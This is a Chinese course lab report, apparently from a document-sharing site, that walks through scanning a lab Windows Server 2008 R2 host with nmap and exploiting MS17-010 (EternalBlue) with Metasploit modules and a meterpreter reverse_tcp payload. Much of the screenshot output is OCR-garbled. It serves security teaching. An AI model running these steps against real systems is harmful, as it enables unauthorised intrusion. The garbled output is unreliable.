实验系统漏洞攻击分析.docx
《实验系统漏洞攻击分析.docx》由会员分享,可在线阅读,更多相关《实验系统漏洞攻击分析.docx(13页珍藏版)》请在三一办公上搜索。
1、实验报告课程名称:计算机病毒与防治实验名称:系统漏洞攻击分析组 号:班 级:项目 负责人小组成员实验日期一、二、三、实验目的1、Metasploit的基本使用2、认识Windows服务器高危漏洞ms17-0103、使用Metasploit漏洞利用模块攻击windows服务器 实验要求Windows 系统、vmware15.0、KALIlinux、Server 2008 R2实验内容靶机:Windows server 2008R2 (IP:192.168.20.40)攻击机:Kali (IP:192.168.6.50)工具:nmap (这里主要用于漏洞扫描)、metasploit(msf)Met
2、asploit,简称msf,是一个几个信息收集,漏洞验证、漏洞利用后渗透模块的渗透测 试框架。1、进入msf输入 msfconsole2、使用msf模块use模块名optionset选项值run 或者 exploit使用模块:查看选项:设置选项:发起攻击: 三、实验步骤1、Windows服务器高危漏洞ms17-010基本情况介绍:(自己核查后,整理输入到此处)提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于 WannaCry勒索病毒的诞生。该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“Eter
3、nalBlue”(永恒之蓝)进行传播。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑 用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻 击、感染。勒索病毒是自熊猫烧香以来影响力最大的病毒之一。本文将利用Metasploit工具来对此漏洞进行一次漏洞利用示范以及提出修复建议2、用nmap的漏洞扫描模式,扫描靶机看靶机上是否有ms17-010漏洞 命令:nmap -script=vuln 192.168.20.40r(root&kali202Qi-L# nmap - -sc ript=VLiln 192.168.20 .60Starting Nmap
4、 7.91 ( https:/nmap.org ) at 2021-11-22 09:95 HKT-1AC Address : 0O:OC: 29 : C6:89: GA (VMwacq Host script results:| _samba - i/uln -cve - 2012 -1182: NT .STATUS. ACCESS_DENIED5mb-vuln-ms 10-054: false2smb vuln ms 10-051: NT_STATU_ACCESS_DENI:EDsmE-vuLn-ms :VLJLNFRARLF:| Remote Code Execution vulnera
5、bility In Microsoft SHBvl servers (rrsl7-0Lt)| State: VULNERABLEIDs: CVE:CVE-2017-0143Risk factor: HIGHA critical remote code execution vulnerability exists in Miercsoft SMBvl se rvsrs (ms 17-010).| Disclosure date : 2017-03-14Ref e rerces : v ra ry/secu rity/msl7-910.aspx_https:/eve.mil re.arg/cgi-
6、bin/cvenam&.cgi?name=CVE-2017-9143注:进入msf输入Msfconsole3、使用msf模块1)使用msf搜索ms17-010漏洞(操作结果截图)Diactasure D2017-03-H2017-03-142017-93-142017-11-15# NameG exploit/windaws/siTb/G10_eternalblue indows Kernel Pool Correption1 exploit/windows / s10_p sexecnergy/l-trnalChampion SMH Remote Windows Code l-xecutio
7、n2 auxi I iary/admin/5nib/B_010_caminand nergy/Eternatcriannpian SMB Remote Windows Command Execution3 auxiliary/scHnne r /srrtVmbJimUJHO4 exploit/windows/fileformat/of118825 auxiliary/admin/m55ql/m55ql e5calate_execute es CUTE AS6 auxilia ry/ad mi n/ms s ql/ms s ql_es calat e_exec u t e_a s_s qIi q
8、 Execute AS7 auxilia ry/admin/m5sql/mssql_Qnim_domain_accoLnts_sqlL MAMI- Windows Domain Account Hint me rationEauxi 11.ary/admLn/rnssql./ins5ql_en jm sql logins2)使用辅助模块,检查漏洞是否存在使用模块:use auxiliary/scanner/smb/smb_ms17_010(操作截图)m f6 use auxiliary/admin/smb/ms17_0L0_commandn)sT6 auxiliary(admin/snb/ii
9、slZ &lB command) |Ehl,打rnn+fRrlS 1 tfl Jfl S?设置选项:set RHOSTS 192.168.6.110(操作截图)btKVlLt_DtbLKLR 11UINROiservice d sting( SERVICE DISPLAY NAMEmaThie s rviSERVICE NAMEnoThe se rvi1 SMBDcmikainnoThe WindoSMBPassnoThe passwSMBSHAREC$yesThe nameSMBUsernoThe usernTHREADS1yesTIi 白 numb口WINPATHWINDOWSyesThp
10、 ncimemi5 f & au xil i a ry (a d min/ s mb / ms 17 _0 16_c o m ma nd) set r hosts 152.168.29.60rhosts = L92.1GB.2B.6B,时6 auxiliaryfadmin/smb/mslZ ftie coHiiand) = runf 192. I.G8.20.60:445-Target OS: Windows Server 2806 R2 Standard 760flr - 192.16&.2e.66:445-Unable to find sccesibLe namd pipe1*1 192.
11、158.20.60:445-Scanned 1 of 1 hosts (100 complete)* AuxiLiary module execution completedmsf6 an xil i a ry (a d min/ s mb / ms 17_9 lB_c o na nd) | 11 - - u . i* j.-ca Ax一 h y rt rc m . rr4、使用攻击模块使用模块:use exploit/windows/smb/ms17_010_psexec(操作截图)msf B e I g it wi nd t ws/s mh /ns 17_B 16 _ete rnal bl
12、 ue) use e Kpl a it /w ind d ws /smto /ms 17_010_t e rnalbl ui * Using tenfigured payload windows/x64/meterpreter/rGverse_tcpmsfB expIgitwindows/smh/ns 17 816 eternalblue) 查看选项:options设置选项:set RHOSTS 192.168.6.110(操作截图)VERIFY TAflGET trueyas4 vrirv h v n s je 、 m v w w emi、 w M i-i|x ua I vri I.J v
13、i M v hMQ6 R2r Windows L Windows Enfiedded Standard 7 target iKKhineSr Chsck if rsmto- OS rrsatchc-s sploit T-arget. Only affacts Window Sarwar 2006 R2r W indDws- L Windows Embedded Standard 7 target nochinos.Payload apt ions (win/mfi-tQ rpratcr/ rflvorsn_tcp J:Nanc-Current batting Roquirad D&script
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 实验 系统漏洞 攻击 分析

链接地址:https://www.31ppt.com/p-5175549.html